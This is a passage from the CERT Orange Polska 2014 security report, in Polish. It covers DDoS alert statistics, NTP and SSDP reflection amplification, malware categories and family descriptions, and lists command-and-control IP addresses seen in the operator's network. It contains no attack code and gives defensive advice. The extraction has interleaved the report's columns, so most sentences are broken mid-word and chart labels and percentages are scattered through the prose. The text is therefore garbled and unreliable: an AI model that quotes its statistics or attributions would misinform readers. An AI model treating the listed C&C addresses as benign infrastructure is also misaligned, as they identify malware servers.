2014/01/01 2014/02/01 2014/03/01 2014/04/01 2014/05/01 2014/06/01 2014/07/01 2014/08/01 2014/09/01 2014/10/01 2014/11/01 2014/12/01 6.1 Ryzyka związane z atakami DDoS data

Nieprzygotowana, zaskoczona atakiem DDoS ofiara nie za darmo w ramach „testu usługi” – dobry przykład coraz ma w większości przypadków możliwości obrony bądź bardziej powszechnego trendu związanego z oferowaniem Wykres 5. też potencjalne środki obrony są tylko pozorne (np. restart usług typu CaaS (Crime as a Service). Pięciominutowy atak Poziom krytyczności alertów DDoS aplikacji, serwerów, urządzeń) i nie prowadzą do pełnego w zupełności wystarcza, by uniemożliwić wykonanie trans- w rozkładzie procentowym przywrócenia usługi. Odcięcia atakowanego serwisu od akcji w określonym czasie, zablokować dostęp do usługi niski 60% sieci nie można nazwać środkiem zaradczym, skoro wła- w krytycznym czasie czy wylogować gracza z gry online śnie to było celem atakującego. podczas e-sportowych rozgrywek. Obserwowane w grudniu (okres świąteczny) ataki na ser- DDoS jest również używany jako atak pozorowany, mają- wisy potentatów rozrywki sieciowej (PSN i XBOX Live) cy w rzeczywistości umożliwić przepuszczenie złośliwego spowodowały straty finansowe liczone w milionach dola- ruchu. Często w przypadku braku innych opcji dla zacho- średni 30% rów. Ataków DDoS będących w stanie zablokować usługi wania ciągłości biznesu mogą zostać wyłączone bądź największych korporacji jest coraz więcej – choćby z racji przeciążone urządzenia chroniące sieć (np. IPS). DDoS dużej podaży botnetów, które można wykorzystać do ata- może również mieć na celu ukrycie pośród milionów pakie- ku. Dzięki temu takie „usługi” są na czarnym rynku dostęp- tów znamion włamania i nieautoryzowanego uzyskania poziom krytyczności alertu ne za niewielkie pieniądze. dostępu do serwerów przedsiębiorstwa. wysoki 10% Równie niebezpieczne są kilkuminutowe ataki proponowane

udział procentowy 6.2 Statystyki

W 2014 roku CERT Orange Polska zidentyfikował 106 768 Dlatego informacje o potencjalnym zagrożeniu pojawia- alertów DDoS (ostrzeżeń o ruchu noszącym znamiona ata- ją się po przekroczeniu określonych progów alarmowych ku) dotyczących sieci usługowej Orange Polska, co daje ustawianych na relatywnie wysokim poziomie. średnio ok. 9 tysięcy alertów miesięcznie. To blisko 40-pro- Alerty z poziomem krytyczności „Wysoki” stanowią 9 procentowy wzrost w porównaniu z 2013 rokiem. Alerty DDoS cent wszystkich ataków. Krytyczność alertu zależna jest w 2014 roku w podziale na poziom krytyczności przedsta- od wolumenu ruchu oraz czasu jego trwania. Alert skla- wiono na Wykresie 4, zaś w rozkładzie procentowym – na syfikowany jako „Wysoki” najczęściej ma istotny wpływ Wykresie 5. Jednego przypadku ataku może dotyczyć kilka na dostępność usług. Alerty o poziomie średnim i niskim lub kilkanaście alertów, występują także tzw. false positive ograniczają dostępność usług jedynie w specyficznych – klasyfikacja prawidłowego ruchu jako anomalii. W niektó- warunkach, w przypadkach wystąpienia okoliczności nie- rych przypadkach ataków infrastruktura sieciowa potrafi sprzyjających dla atakowanego. rozproszyć próbę bez udziału specjalistycznych rozwiązań, >> Wykres 4. i 5. więc nie zostanie on zobrazowany w statystykach alertów.

18 19 Raport CERT Orange Polska za rok 2014

Typy ataków DDoS obserwowanych w sieci Orange Pol- Na powyższych wykresach ruch w kierunku „out” jest Wykres 6. ska, przedstawiono na Wykresie 6. Poniżej szczegółowo znikomy w porównaniu do ruchu „in”. Obrazuje to, w jak UDP Fragmentation 49% Typy ataków DDoS opisano poszczególne kategorie. znaczący sposób przy tego rodzaju atakach następuje Reflected DDoS 33% >> Wykres 6. wzmocnienie ruchu – zwielokrotnienie wolumenu odpowiedzi kierowanych do atakowanych hostów. UDP Flood 6% • UDP Fragmentation Na czym polega atak Reflected DDoS? Atakujący urucha- ICMP Flood 5% Związany z fragmentacją pakietów UDP, czyli z wysyła- mia botnet (1). Boty, podszywając się pod adres ofiary, typ ataku niem dużych pakietów (powyżej MTU2 1500). Koniecz- wysyłają krótkie zapytania do podatnych serwerów/urzą- SYN Flood 4% ność ich ponownego połączenia w znacznym stopniu dzeń (2). Urządzenia „w imieniu” ofiary odpytują serwer Inne (TCP RST, ...) 3% wykorzystuje zasoby procesora. DNS (3), a ten zwraca odpowiedź na adres zaatakowane- • Reflected DDoS go (4). W rezultacie cel zalewany jest tysiącami odpowiedzi udział procentowy Wysyłanie krótkich zapytań do urządzeń, w trakcie o rozmiarze dużo większym niż inicjujące zapytanie. których atakujący podszywa się pod maszynę ofiary. >> Rysunek 3. Wykres 7. Urządzenia docelowe odpowiadają pakietami kiero- ntp (1900) in ntp (1900) out Charakterystyka ruchu na porcie wanymi na adres pochodzący z fałszywego nagłów- Użycie tej techniki powoduje zwiększenie siły ataku bez 60 123 na analizowanym łączu ka, a ofiara zalewana jest olbrzymią liczbą pakietów znacznego zwiększania zasobów atakującego, tym samym 50 40 Orange Polska z wielu hostów. Najczęściej wykorzystują podatności nie wymaga posiadania kontroli nad dużymi zasobami ata- 30 protokołów bazujących na UDP (m.in. DNS, SNMP, kującymi (botnetem), wystarczy lista podatnych urządzeń/ 20 10 CHARGEN, NTP czy SSDP). serwerów i proste skrypty do jego przeprowadzenia. Sza- ruch (Gbps) 0 • UDP/ICMP Flood cuje się, że podatnych urządzeń wykorzystujących protokół Zalewanie atakowanego hosta pakietami UDP/ICMP SSDP na świecie jest ok. 15 mln (w Polsce ok. 115 tys.)3, 01/01 02/01 03/01 04/01 05/01 06/01 07/01 08/01 09/01 10/01 11/01 12/01 wysyłanymi z wielu przejętych hostów/urządzeń (botów). co pozwala na przeprowadzenie dużego ataku DDoS przy • SYN Flood / TCP RST / NULL relatywnie niskim koszcie. Rekordowe ataki tego typu na data Wykorzystuje połączenie inicjujące TCP (z flagą SYN/ świecie sięgają kilkuset Gbps4. RST/NULL), np. zalewanie atakowanego hosta pakietami TCP z ustawioną flagą synchronizacji (SYN), rese- Charakterystyka protokołu NTP powoduje, że wysyłana Wykres 8. towaniem połączenia (RST) lub bez flagi (NULL). przez serwery NTP odpowiedź może być maksymalnie Charakterystyka ruchu na porcie nawet 556,9 raza5 większa od inicjującego pakietu. Pro- 1900 na analizowanym łączu Z punktu widzenia użytkownika każdy z wyżej wymienio- tokół NTP wykorzystuje połączenia UDP na porcie 123 do Orange Polska nych rodzajów ataku jest niebezpieczny, gdyż powoduje synchronizacji czasu pomiędzy komputerami w sieci, nato- utratę lub ograniczenie dostępności usług sieciowych, miast protokół SSDP służy do wykrywania urządzeń UPnP ssdp (1900) in ssdp (1900) out takich m.in. jak serwisy webowe, poczta elektroniczna czy (Universal Plug and Play) i wykorzystuje połączenia UDP na DNS. porcie 1900. 40 35 W 2014 roku byliśmy świadkami upowszechnienia nowej Istotnym problemem wydają się urządzenia bezpieczeń- 30 25 metody wzmacniania ataków DDoS. Od początku roku stwa dla SOHO (Small Office/Home Office), które usiłują 20 15 przestępcy zaczęli wykorzystywać m.in. niepoprawnie pogodzić niską cenę z szerokim zakresem oferowanych ruch (Gbps) 10 skonfigurowane serwery czasu (NTP – Network Time Pro- funkcjonalności, w efekcie proponując końcowemu użyt- 0 tocol), co zostało zobrazowane na Wykresie 7. Natomiast kownikowi bardzo niski poziom bezpieczeństwa. Razem

01/01 02/01 03/01 04/01 05/01 06/01 07/01 08/01 09/01 10/01 11/01 12/01 od trzeciego kwartału 2014 roku obserwowany jest wzrost z otwartymi serwerami DNS (open DNS-resolvers) czy też Rysunek 3. wykorzystania protokół SSDP (Simple Service Discovery publicznymi i otwartymi serwerami NTP i SNMP daje to botnet Przykład ataku DNS Reflected data 1 Protocol) do akceleracji ataków uwidoczniony na Wykresie szereg potencjalnych wektorów ataku. Jeżeli użytkownicy (grafika: Arbor) 8. Pozwalało to atakującym na przeprowadzenie efektyw- nie będą mieli świadomości, że stosowanie odpowiednich nych ataków wolumetrycznych, bowiem odpowiedź źle zabezpieczeń jest konieczne, same działania prowadzone fałszywe IP ofiary skonfigurowanego serwera/usługi jest nawet kilkudziesię- po stronie operatora (mitygacja ataków w czasie rzeczywi- 2 ciokrotnie większa od kierowanego do niego zapytania. Na stym, filtrowanie podrobionych pakietów) mogą się okazać kolejnych wykresach przedstawiono charakterystykę ruchu niewystarczające.

3 DNS na porcie 123 (NTP) z/do analizowanego łącza Orange Pol- By się bronić przed tego typu atakami, należy: atakujący open ska (transfer danych na łączu przekraczał momentami 50 • wyłączyć usługę wszędzie tam, gdzie nie jest potrzebna, resolvers Gbps) oraz charakterystykę ruchu na porcie 1900 (SSDP). • nie udostępniać usług wszystkim użytkownikom, jeśli

4 >> Wykres 7. i 8. nie jest to konieczne, • korzystać z możliwie najnowszej wersji protokołu. ofiara

2 Maximum Transportation Unit – rozmiar największego datagramu możliwego do przekazania przez warstwę protokołu komunikacyjnego 3 Źródło: https://ssdpscan.shadowserver.org/ – dane na dzień 2015-01-05 20 4 Źródło: http://www.arbornetworks.com/asert/2014/03/ntp-attacks-continue-a-quick-look-at-traffic-over-the-past-few-months/ 21 5 Źródło: US-CERT, https://www.us-cert.gov/ncas/alerts/TA14-017A Raport CERT Orange Polska za rok 2014

Siła oraz czas trwania ataków DDoS 6.3 Okiem partnera – Radware

Z roku na rok obserwujemy wzrost siły ataków DDoS. Na Od kilku lat utrzymuje się tendencja dywersyfikacji celów ata- Wykresie 9. przedstawiono obserwowany przez CERT ku połączona ze skracaniem czasu ich trwania. Ubiegły rok Orange Polska rozkład procentowy wielkości ruchu po raz kolejny potwierdził ten trend i w 2015 roku możemy się generowanego w atakach DDoS. Wzrost siły ataków spodziewać jego utrzymania. Krótkotrwałe ataki są bolącz- jest spowodowany nie tylko coraz większą dostępnością ką dla form ochrony przed DDoS zakładających uruchomie- i przystępnością cenową szerokopasmowych łączy inter- nie mitygacji po kilku/kilkunastu minutach ciągłego ataku. Serwery, firewalle, łącze dostępowe – to wszystko padało ofiarą ataków DDoS. netowych oraz większą liczbą urządzeń w sieci. Jest spo- Najczęściej zawodziło samo łącze, wysycając się do tego stopnia, że ruch siecio- wodowany również stosowaniem nowych technik wzmac- Istnieje duża liczba metod ochrony przed atakami DDoS, wy nie docierał już do urządzeń sieciowych. Ubiegły rok był dla cyberprzestęp- niania ataków (np. z wykorzystaniem protokołu NTP czy jednak duże ataki wolumetryczne mogą zostać zmitygo- ców czasem prób, jeśli chodzi o protokoły internetowe. Sprawdzali chyba każdy SSDP), a także spadkiem cen ataków dostępnych na czar- wane jedynie na poziomie ISP bądź przy wsparciu specjali- – DNS, NTP, CHARGEN, SSDP itd. – by zdecydować, który najbardziej nadaje nym rynku. stycznych firm „ukrywających” chronione serwisy za swoją się do ataków Reflected DDoS. Średnia wielkość szczytowego natężenia ataku odnotowa- infrastrukturą. W takiej sytuacji ograniczenie skutków ataku Na każdą kampanię cyberprzestępczą, którą obserwowaliśmy w ubiegłym roku, na przez CERT Orange Polska to ok. 900 Mbps, natomiast następuje dzięki geograficznemu rozproszeniu węzłów, za składały się różnorodne wektory ataku, do tego stopnia, że to kampanie uży- największa odnotowana wartość natężenia ruchu w szczy- którymi serwis jest dostępny, filtrowaniu złośliwego ruchu wające jednego wektora można by nazwać wyjątkowymi. Dla zwykłego inter- cie ataku to ok. 93 Gbps/50 Mpps. oraz łączom o dużej przepustowości. nauty DDoS to po prostu DDoS, istnieją jednak setki jego wariantów, nierzad- >> Wykres 9. Dla ochrony własnej sieci korporacyjnej przed DDoS Oran- ko w wyniku ataku kreujące nowe warianty. Przykładowo Tsunami SYN Flood, ge Polska używa rozwiązań wiodącego producenta Arbor odkryty w 2014 roku, bazuje na klasycznym SYN Flood, nie mamy jednak do Wykres 10. przedstawia rozkład procentowy czasu trwania Networks. Wykorzystujemy także możliwości blokowania czynienia z „pustymi” pakietami TCP SYN, bowiem każdy z nich zawiera jesz- ataków DDoS. Większość zarejestrowanych alertów trwała adresów potwierdzonych jako źródło ataków albo ogra- cze ok. 1 kB nieistotnych danych, pozwalając atakującemu przeprowadzić atak poniżej 10 minut, natomiast średni czas trwania wszystkich niczenia dostępu do atakowanych zasobów. Identyczne wolumetryczny przy użyciu protokołu TCP. Co ciekawe, RFC nie odrzuca takich zarejestrowanych alertów to ok. kilkunastu minut. rozwiązanie w postaci usług oferujemy również swoim przypadków użycia. >> Wykres 10. klientom. Zaobserwowaliśmy też szereg kampanii, w których silny atak SYN Flood trwał Werner Thalmeier, przez minutę i został wznowiony po 15-minutowej przerwie. W innych przy- Director Security Solutions EMEA & CALA padkach organizacja przez 3 minuty była celem bardzo dużego ataku wolume- trycznego, który następnie milkł na godzinę, a po tym czasie został wznowiony. To odpowiedź na zabezpieczenia przeciwko DDoS, które osiągają pełną efek- tywność po kilku minutach od stwierdzenia ataku – tego typu ataki pozwalają na Wykres 9. ich faktyczne ominięcie. powyżej 10 3,8% Wolumen ataków DDoS zaobserwowanych w sieci Orange Polska 5-10 3,7% W ubiegłym roku zaobserwowaliśmy również wyraźny wzrost czasu trwania ata- ków. 19 procent ofiar zgłaszało, że było atakowane w trybie ciągłym. W minio- 2-5 8,8% nych latach (2013, 2012 and 2011) często zdarzały się sytuacje, gdy raportowa- 0,5-2 30,6% no tygodniowe, czy nawet miesięczne ataki, ale liczba badanych przez Radware

0,2-0,5 28,8% firm, padających ofiarą ataków ciągłych, nigdy nie przekraczała 6 procent! To może być poważne wyzwanie w 2015 roku.

wolumen ataku [Gbps] poniżej 0,2 24,3%

Firma Radware to jeden z czołowych światowych dostawców rozwiązań ochrony udział procentowy przed atakami DDoS.

Wykres 10.

powyżej 60 2,2% Czas trwania ataków DDoS zaobserwowanych w sieci Orange 30-60 3,0% Polska 15-30 16,0%

10-15 20,0%

poniżej 10 58,9% czas trwania alertu (minuty) udział procentowy

22 23 Raport CERT Orange Polska za rok 2014

7. Malware

Malware (od angielskich słów malicious – złośliwy, softwa- • robak re – oprogramowanie) to termin używany na określenie Ma za zadanie szybko rozprzestrzeniać się pomiędzy oprogramowania, którego zadaniem jest wykonywanie systemami operacyjnymi i zainfekować jak największą szkodliwych działań na komputerze ofiary. Oprogramo- liczbę maszyn. wanie tego typu infekuje komputery, jest na nich instalo- • trojan wane bez wiedzy i zgody użytkowników. Do dystrybucji Oprogramowanie, które pod pozorem niegroźnych złośliwego oprogramowania wykorzystywane są na przy- działań wprowadza na urządzenie ofiary inne złośliwe kład mailowe ataki phishingowe (przesyłanie zainfekowa- programy i funkcjonalności. nych złośliwym kodem plików), skłonienie użytkownika do • backdoor odwiedzenia strony zawierającej takie oprogramowanie, Cyberprzestępcy instalują na zaatakowanych syste- instalowanie malware’u umieszczonego w pirackich wer- mach backdoory (tylne wejścia) w celu zapewnienia sjach programów bądź plikach znalezionych w internecie. sobie dostępu do nich w późniejszym czasie. Złośliwe oprogramowanie jest często wykorzystywane do • rootkit przejmowania kontroli nad zainfekowanymi komputerami Ma za zadanie ukryć inne programy w systemie, przez osoby nieuprawnione i dołączania tych urządzeń do a przez to utrudnić ich odnalezienie i analizę. Często sieci botnetowych. Może być również przyczyną wycieku robi to, ingerując głęboko w mechanizmy działające Malware to termin używany na danych zgromadzonych na nośnikach podłączonych do u podstaw systemów operacyjnych. zainfekowanych stacji roboczych, a także kradzieży pouf- • exploit nych informacji wprowadzanych przez użytkowników (m.in. Wykorzystuje występujący w oprogramowaniu błąd określenie oprogramowania, loginy, hasła). programistyczny w celu przejęcia kontroli nad dzia- łaniem procesu i uruchomienia powłoki systemowej W 2014 roku zaobserwowano znaczący wzrost liczby z uprawnieniami programu, w którym wykryto lukę malware opracowanego na urządzenia mobilne przede w zabezpieczeniach. którego zadaniem jest wszystkim pracujące pod kontrolą systemu Android, jed- • keylogger nak inne systemy operacyjne zarządzające naszymi smart- Zbiera informacje wprowadzane do systemu przez fonami również nie są wolne od zagrożeń. użytkownika za pomocą klawiatury/myszy. Pojęcie złośliwych operacji trudno zdefiniować jedno- wykonywanie szkodliwych znacznie, tym niemniej na ogólnym poziomie przyjęto, Opisując złośliwe oprogramowanie, nie można zapominać że wiążą się one z następującymi skutkami: o pojęciach „bot” i „botnet”. Bot to komputer zainfekowa- • uzyskiwanie przez użytkownika dostępu do informacji, ny złośliwym oprogramowaniem, łączący się i odbierający działań na komputerze ofiary dla którego nie jest ona przeznaczona, komendy z Centrum Kontroli (Command&Control, C&C). • zakłócanie działania systemów. Botnet natomiast to sieć botów. Współczesnego malware najczęściej nie da się przypo- W szczególności są to następujące funkcje: rządkować do konkretnej kategorii, ma on bowiem cechy • wykonywanie ataków DDoS, kilku z nich. Dla przykładu ZeroAccess to trojan służący • kradzież danych, jako platforma do instalacji innego złośliwego oprogra- • rozprzestrzenianie się na inne systemy i oprogramo- mowania, wykorzystująca zaawansowane techniki ukry- wanie, wania się w systemie operacyjnym charakterystyczne dla • niszczenie danych. rootkitów. Z kolei Stuxnet propaguje się jak robak, ale ma również funkcje trojana, komunikującego się ze zdalnymi Można wyróżnić kilka głównych typów złośliwego oprogra- węzłami C&C. mowania (klasyfikacja wg ENISA6): • wirus Użytkownik sieci korzystający z portalu bankowości online Infekuje inne oprogramowanie, np. program wykony- może paść ofiarą tzw. trojana bankowego. Jego elementy walny EXE, a ten następnie infekuje kolejne odnale- rozmieszczone w zainfekowanym systemie zbierają dzięki zione na dysku lub uruchomione przez użytkownika wykorzystaniu zaawansowanych technik informacje, zwią- programy EXE. zane z zarządzaniem kontem bankowym ofiary.

6 https://www.enisa.europa.eu/activities/Resilience-and-CIIP/critical-applications/botnets/botnets-measurement-detection-disinfection-and-defence 25 Raport CERT Orange Polska za rok 2014

Wykres 11. Chodzi m.in. o odczytywanie naciśnięć klawiszy, zrzuty umieszczonych w różnych punktach sieci klienckiej. Nowe Typy zagrożeń złośliwym ekranu przy klikaniu myszką (dla zarejestrowania interak- instancje złośliwego oprogramowania zidentyfikowane 90% oprogramowaniem cji z wirtualną klawiaturą), podsłuchiwanie i modyfikowanie w sieci Orange Polska są szczegółowo analizowane, zaś

80% informacji na poziomie przeglądarki bądź jej dodatków (np. jeśli w wyniku analizy zostaną ustalone np. adresy centrów Java). CERT Orange Polska pozyskuje informacje o nowych Command&Control, docelowo dostęp do nich jest bloko- 70% przypadkach złośliwego kodu z urządzeń monitorujących wany z całej sieci, której operatorem jest Orange Polska.

60%

50% 7.1 Malware na platformy stacjonarne 40% Malware Callback

30% Infection Match Mając na uwadze ewolucję zagrożeń, CERT Orange Pol- serwera Command&Control. Złośliwe oprogramowanie

20% Domain Match ska prowadzi ciągły rozwój narzędzi monitorowania zagro- używa bowiem algorytmów generowania domen (Domain żeń i przeciwdziałania im. We wrześniu 2014 roku uru- Generation Algorithm, DGA) tworzących dynamicznie skła- 10% chomiona została nowa platforma bezpieczeństwa, dzięki dające się z ciągów losowych znaków nazwy domen, do

0% której możliwe jest monitorowanie poziomu i minimalizacja których przypisany jest przeważnie jeden lub dwa serwery nik nik zagrożeń związanych z malware, a dotykających użytkow- Command&Control. listopa d listopa d ników sieci Orange Polska. Wykres 11. przedstawia udział grudzień grudzień wrzesień wrzesień paździer paździer procentowy trzech najpopularniejszych rodzajów zagrożeń Wiele z wymienionych zagrożeń uwarunkowanych jest sta- występujących w sieci Orange Polska. Obrazuje zdarze- le rosnącą liczbą błędów i podatności, wykorzystywanych Użytkownicy – Neostrada Użytkownicy – Internet DSL nia związane ze złośliwym oprogramowaniem pod wzglę- w tworzeniu złośliwego oprogramowania lub ułatwiających dem unikalnych użytkowników dla łącz usługi Neostrada infekowanie systemów operacyjnych. Lekarstwem na (głównie użytkownicy prywatni) oraz Internet DSL (głównie wzrost zagrożeń może być bardziej powszechne wprowa-

Wykres 12. małe i średnie podmioty gospodarcze) dla reprezenta- dzanie środków zapobiegawczych, m.in. sond monitorują- Złośliwe oprogramowanie w funkcji liczby Top 5 typów zagrożeń złośliwym tywnej próbki 25 tys. użytkowników. Te i kolejne wykresy cych ruch sieci botnetowych również pod kątem konkret- alarmów Callback dla Neostrady oprogramowaniem dla klientów przedstawiają próbkę w postaci wartości z czterech ostat- nych odmian złośliwego oprogramowania. nich miesięcy 2014 roku. W kolejnym okresie raportowym Poniższe dwa wykresy przedstawiają aktywność Top 5 60% Neostrada 57% możliwe będzie wskazanie pełnego zakresu danych z 12 najpopularniejszego złośliwego oprogramowania zareje- miesięcy. strowaną na próbce 25 tysięcy klientów łącz Neostrada 49% 50% >> Wykres 11. i Internet DSL od września do grudnia 2014 roku. Pod uwagę brano liczbę unikalnych połączeń od użytkowników Od września do grudnia 2014 roku dla łącz usługi Neo- do serwerów Command&Control. 40% Local.Callback strada zauważalna jest spadkowa tendencja dla malware >> Wykres 12. Trojan.ZeroAccess z kategorii Infection Match. Zdarzenia zdefiniowane jako >> Wykres 13. 30% Trojan.Sisron Infection Match przedstawiają infekcje w czasie rzeczywi- 23% 22% stym widocznie m.in. w formie zarażonych plików pobiera- Największą aktywność na powyższych wykresach można Worm.Email.Brontok 20% 20% 18% nych na urządzenie użytkownika, złośliwego kodu wyko- zauważyć w przypadku zainfekowania użytkowników Inter- Trojan.Sality nywanego podczas otwierania zainfekowanych witryn albo net DSL malware o nazwie „InfoStealer.Zbot”. To rodzina kolejnych prób infekcji na zarażonej już stacji. Zeusa – popularnego wirusa wykradającego dane – zwią- 10% 10% 5% Znaczny wzrost zagrożeń można zauważyć dla Malware zane z bankowością elektroniczną. Na opisywanej próbce 3% 5% 5% 5% 3% 2% Callback oraz Domain Match. widać również drastyczny wzrost w ostatnich miesiącach 2% 1% 1% 1% 1% 1% 0% roku liczby infekcji wirusem Backdoor.APT.LV (jej przyczyny wrzesień październik listopad grudzień Malware Callback to połączenie wykonywane przez mal- zostały szerzej wyjaśnione w tym rozdziale w części ze spo- ware zainstalowany na zainfekowanym komputerze strzeżeniami naszego partnera, firmy FireEye) oraz Trojan. z serwerem Command&Control w celu pobrania instruk- Zero.Access. Statystyki potwierdzają informacje medialne, cji sterujących oraz wysyłania wykradzionych danych lub mówiące o tym, że cyberprzestępcy przeprowadzili pod aktualizacji złośliwego oprogramowania. Domain Match koniec roku skoordynowaną falę ataków, wykorzystując jest wysyłanym z zainfekowanego przez malware kompu- odmiany złośliwego kodu niewykrywanego w tamtym okresie tera zapytaniem o nazwę domeny używanej do lokalizacji przez oprogramowanie antywirusowe.

26 27 Raport CERT Orange Polska za rok 2014

Wykres 13. Opisy najciekawszych malware (szczegółowe analizy przy- • Backdoor.DarkComet Złośliwe oprogramowanie w funkcji liczby Top 5 typów zagrożeń złośliwym padków złośliwego oprogramowania zostały zamieszczo- Backdoor pozwalający atakującemu na uzyskanie nie- alarmów Callback dla klientów Internet DSL oprogramowaniem dla klientów ne w załącznikach od 1. do 3. w końcowej części raportu): autoryzowanego dostępu do komputera i kontroli nad Internet DSL • Trojan.ZeroAccess zarażonym komputerem. 45% Za pośrednictwem backdoora w systemie operacyj- • Local.Callback 39% 40% nym trojan wymusza komunikację z zarażonej stacji Połączenie do centrum sterowania nie mające cech

35% 33% InfoStealer.Zbot do zewnętrznego centrum sterowania, np. na porcie charakterystycznych pozwalających na określenie TCP 49163. Potrafi również przez ukryte pliki syste- jego przynależności do specyficznej rodziny złośliwego 30% 28% 27% Backdoor.NjwOrm 25% mowe zestawić połączenie TCP 80 do pobierania na oprogramowania. 25% Trojan.Ramnit zainfekowane urządzenie różnego rodzaju złośliwego 20% 20% 21% 20% 17% Trojan.ZeroAccess oprogramowania. Wykres 14. przedstawia próbkę ruchu z czterech miesię- 15% 15% Backdoor.APT.LV • InfoStealer.Zbot cy dotyczącą powiązania użytkowników usług Internet DSL

10% 9% Koń trojański (rodzina Zeus), który wykrada poufne oraz Neostrada w udziale procentowym z ruchem o cha- 8% 7% 6% 6% rakterze anomalii wywołanym złośliwym oprogramowaniem. 4% dane z zainfekowanego komputera. Jest w stanie 5% 4% 1% 1% pobierać samodzielnie pliki konfiguracyjne i aktualiza- >> Wykres 14. 0% 0% cje z centrum sterowania. wrzesień październik listopad grudzień • Backdoor.Njw0rm Obserwacje ruchu dowodzą, że w badanym okresie Koń trojański wykradający hasła dostępowe zapisa- z adresów IP średnio u 50 procent użytkowników stwier- ne w pamięci zarażonego komputera. Jest w stanie dzono ruch wskazujący na działanie złośliwego oprogra- przenieść się na urządzenia sieciowe albo na nośniki mowania. Wysoki odsetek zarażonych użytkowników zewnętrzne. Internet DSL (z reguły usługi dla małych i średnich firm) Wykres 14. • Trojan.Ramnit może wskazywać zarówno na niski poziom świadomości Użytkownicy powiązani i niepowiązani ze złośliwą zawartością Dane dotyczące komunikacji Koń trojański umożliwiający przejęcie zdalnego dostę- bezpieczeństwa, jak i na brak zabezpieczeń w tego typu użytkowników łącz Neostrada oraz 100% pu do komputera i kontroli nad zarażonym komputerem małych sieciach firmowych. Niższe wskaźniki dotyczące Internet DSL z serwerami C&C 86% 90% Użytkownicy Neostrada przez centrum sterowania, a następnie wykorzystanie sieci Neostrada mogą świadczyć zarówno o wyższej świa- powiązani ze złośliwą zawartością 80% go do celów związanych z cyberprzestępczością. domości bezpieczeństwa użytkowników indywidualnych, 71% 71% • Trojan.Sality jak i o lepszym poziomie zabezpieczeń wykorzystywanych 70% Użytkownicy Neostrada 64% 64% niepowiązani ze złośliwą zawartością 61% 63% Wirus infekujący pliki wykonywalne na dyskach lokal- przez nich urządzeń dostępowych. Nagły skok liczby użyt- 60% 51% Użytkownicy Internet DSL nych, sieciowych i zewnętrznych. Zestawia również kowników, powiązanych ze złośliwą zawartością pokrywa 49% powiązani ze złośliwą zawartością 50% połączenie peer-to-peer z botnetem w celu uzyskania się z przedstawionym na Wykresie 12. znacznym wzro- 39% 37% 35% 40% 36% Użytkownicy Internet DSL URL, prowadząc do kolejnych zainfekowanych plików. stem infekcji trojanem ZeroAccess, dowodząc słuszności 29% 29% niepowiązani ze złośliwą zawartością 30% • Bot.Conficker przedstawionych wcześniej wniosków o ataku złośliwym 20% Otwiera atakującemu zdalny dostęp do warstwy syste- oprogramowaniem niewykrywalnym jeszcze pod koniec 14% 10% mu operacyjnego. Należy do grupy botów pozwalają- 2014 roku.

0% cych na instalowanie backdoorów, ściąganie i wykony- wrzesień październik listopad grudzień wanie dodatkowych złośliwych plików oraz blokowanie Wykres 15. przedstawia Top 5 malware, adresy serwerów dostępu z komputera użytkownika do aplikacji, pro- Command&Control oraz udział procentowy użytkowników gramów i witryn bezpieczeństwa, co znacznie utrudnia Neostrady, którzy łączyli się z nimi w trakcie analizowanego Wykres 15. jego usunięcie. okresu ostatnich czterech miesięcy 2014 roku. Top 5: Adresy IP wykorzystywane przez złośliwe Połączenia do Command&Control • Bot.Mariposa.DNS >> Wykres 15. oprogramowanie dla Neostrady dla Neostrady Oprogramowanie klienckie sieci botnetowej wykrada- 7% jące dane dostępowe użytkowników, infekujące opro- Na łączach Neostrady można zauważyć, że jedyny wzrost 7% gramowanie pocztowe, a także wykorzystujące zara- swojej aktywności miał wirus Trojan.Sisron komunikujący 6% 6% żone komputery do ataków DDoS. się z różnymi serwerami Command&Control. Wiele przy- Worm.Email.Brontok 5% 5% 98.37.201.117 • Trojan.Ramnit.SNK.DNS padków złośliwego oprogramowania powiązanych z kon- 5% Oprogramowanie klienckie sieci botnetowej przejmują- kretną adresacją jednego miesiąca stanowiących najwięk- 4% 4% 4% 4% Trojan.Sisron 4% 4% 4% 42.121.125.34 4% 4% ce zdalną kontrolę nad komputerem zarażonym troja- sze źródło zagrożenia w kolejnych może zupełnie zniknąć 3% 3% 3% Trojan.Sisron nem Ramnit. z monitorowanej sieci. Zazwyczaj oznacza to niestety tylko 3% 42.121.133.1 3% 3% • Worm.Email.Brontok.DNS zmianę charakterystyki odwołań definiujących rodzaj zagro- 2% 2% Trojan.Ramnit Oprogramowanie klienckie sieci botnetowej obsługują- żenia, bądź adresacji końcowej, odpowiadającej za połą- 2% 109.74.195.149 ce robaki emailowe. Robaki Brontok rozprzestrzeniają czenia z ofiarami ataków. Stąd konieczność monitorowania 1% Trojan.Sisron się w załącznikach wiadomości e-mail, zmieniają usta- sieci w trybie ciągłym pod kątem anomalii wskazujących na 1% 118.184.176.15 wienia komputera, modyfikują rejestr i blokują możli- działanie złośliwego oprogramowania.

0% wość jego edycji. wrzesień październik listopad grudzień

28 29 Raport CERT Orange Polska za rok 2014

7.2 Malware na platformy mobilne 7.3 Okiem partnera – FireEye

Telefon komórkowy pozwala dzisiaj na korzystanie z wielu nad systemami mobilnymi. W opinii CERT Orange Polska usług dostępnych w sieci internet. Coraz częściej smart- trend ataków na urządzenia mobilne będzie jeszcze przez fony umożliwiają też dostęp do sieci firmowych, co – przy długi czas regularnie wzrastać. Mimo ciągłego budowania lekceważeniu zagrożeń mobilnych – wprowadza szereg świadomości zagrożeń u użytkowników urządzenia mobil- Przeglądając statystyki związane ze złośliwym oprogramowaniem zaprezentowane dodatkowych ryzyk. Smartfon to praktycznie komputer ne wciąż stanowią najsłabsze ogniwo bezpieczeństwa w raporcie CERT Orange Polska, zwróciłem uwagę na Backdor.APT.LV. W listopa- i dlatego przy korzystaniu z jego funkcjonalności musimy zarówno dla firm, jak i dla prywatnego użytkownika. dzie 2014 roku ponad 30 procent połączeń zwrotnych pochodziło od tego oprogra- liczyć się z takimi samymi zagrożeniami jak w przypadku >> Wykres 16. mowania. Po raz pierwszy został on zaobserwowany we wrześniu 2012 roku, a jego tradycyjnego komputera. Złośliwe oprogramowanie na ter- celem były jednostki zajmujące się edukacją, energetyką, nowoczesnymi technolo- minale mobilne może wykraść ważne dane, wartości pie- W załączniku 3. na końcu raportu można znaleźć szcze- giami, produkcją, usługami finansowymi, opieką zdrowotną oraz telekomunikacją. niężne z kont bankowych albo użyć naszego urządzenia gółową analizę najpopularniejszego trojana występującego We wrześniu i październiku 2014 roku firma FireEye odnotowała w Polsce aktywno- do przeprowadzania ataków DDoS czy spam. Instalując w sieci mobilnej Orange 